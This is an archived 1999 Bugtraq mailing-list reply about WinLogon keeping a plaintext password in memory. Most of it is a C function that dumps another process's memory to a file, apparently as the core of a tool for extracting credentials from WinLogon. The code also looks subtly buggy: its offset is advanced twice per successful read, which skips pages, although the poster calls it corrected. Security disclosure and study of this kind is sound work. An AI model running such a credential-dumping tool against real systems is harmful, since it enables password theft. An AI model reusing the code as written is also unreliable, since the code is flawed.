[13010] in bugtraq
Re: NT WinLogon VM contains plaintext password visible in admin m
daemon@ATHENA.MIT.EDU (Robert Horvick)
Fri Dec 17 13:05:23 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <A7CB8F787221D2119ABB0008C724549601777BAF@exchange2.greatplains.com>
Date: Thu, 16 Dec 1999 13:11:21 -0600
Reply-To: Robert Horvick <rhorvick@GREATPLAINS.COM>
From: Robert Horvick <rhorvick@GREATPLAINS.COM>
X-To: "Jorge_Miguel_Pinto@BancoBPI.PT" <Jorge_Miguel_Pinto@BancoBPI.PT>
To: BUGTRAQ@SECURITYFOCUS.COM
Actually there is a large bug in the code (well - it works just as well but
thousands of times faster and is more correct):
There is no reason to look beyond the application min and max address range
and no reason to read in anything other then page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
LPSTR lpOffset = 0;
LPSTR lpBuf = 0;
DWORD dwRead = 0;
BOOL bLastRead = FALSE;
DWORD dwDumpedBytes = 0;
SYSTEM_INFO si = {0};
FILE *f = 0;
f = fopen(szPath, "wb");
if(f)
{
GetSystemInfo(&si);
lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
for(lpOffset = si.lpMinimumApplicationAddress;
(void*)lpOffset <= si.lpMaximumApplicationAddress;
lpOffset += si.dwPageSize)
{
if(ReadProcessMemory( hProc,
lpOffset,
lpBuf,
si.dwPageSize,
&dwRead))
{
if(bLastRead)
{
fwrite(lpBuf, 1, dwRead, f);
}
else
{
fprintf(f, "\noffset %lx\n", lpOffset);
fwrite(lpBuf, 1, dwRead, f);
bLastRead = TRUE;
}
dwDumpedBytes += dwRead;
lpOffset += si.dwPageSize;
}
else
{
bLastRead = FALSE;
}
}
fclose(f);
}
else
{
fprintf(stderr, "Unable to open %s", szPath);
}
return dwDumpedBytes;
}
-----Original Message-----
From: Jorge_Miguel_Pinto@BancoBPI.PT
[mailto:Jorge_Miguel_Pinto@BancoBPI.PT]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvick@GREATPLAINS.COM
Cc: BUGTRAQ@SECURITYFOCUS.COM
Subject: RE: NT WinLogon VM contains plaintext password visible in admin
m ode
I am sorry, but only read this today...
There is small bug in this code...
<! LPSTR lpOffset = (void*)1;
!> LPSTR lpOffset = (LPSTR)1;
This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
Greetings,
J.
